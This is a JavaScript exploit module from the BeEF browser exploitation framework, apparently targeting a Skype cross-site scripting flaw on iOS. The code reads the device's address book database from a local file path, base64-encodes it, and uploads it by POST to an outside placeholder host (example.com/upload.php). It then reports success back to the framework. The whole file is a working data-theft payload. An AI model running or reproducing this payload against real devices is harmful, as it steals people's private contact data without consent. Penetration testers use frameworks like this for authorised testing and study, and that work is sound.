Path: blob/master/modules/exploits/skype_xss/command.js
1154 views
//1// Copyright (c) 2006-2025 Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//5beef.execute(function() {67x = new XMLHttpRequest;8x.open("get","file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb");9x.overrideMimeType("text/plain; charset=x-user-defined");10x.send();1112x.onreadystatechange = function() {13if(x.readyState == 4){14a = x.responseText || "";15ff=[];16mx=a.length;17scc = String.fromCharCode;18}19for(var z = 0 ; z < mx ; z++){20ff[z] = scc(a.charCodeAt(z)&255);21}2223b=ff.join("");24b=btoa(b);25xp = new XMLHttpRequest;26xp.open("post","http://example.com/upload.php",!0);27xp.setRequestHeader("Content-Type","multipart/form-data;boundary=xxx,");28a = "--xxx\r\nContent-Disposition:form-data;name=\"media\";filename=\"ios.sqlitedb\"\r\nContent-Type:application/octet-stream\r\n\r\n"+b+"\r\n--xxx--";29xp.send(a);30};3132beef.net.send("<%= @command_url %>", <%= @command_id %>, 'SQL file sent');3334});35363738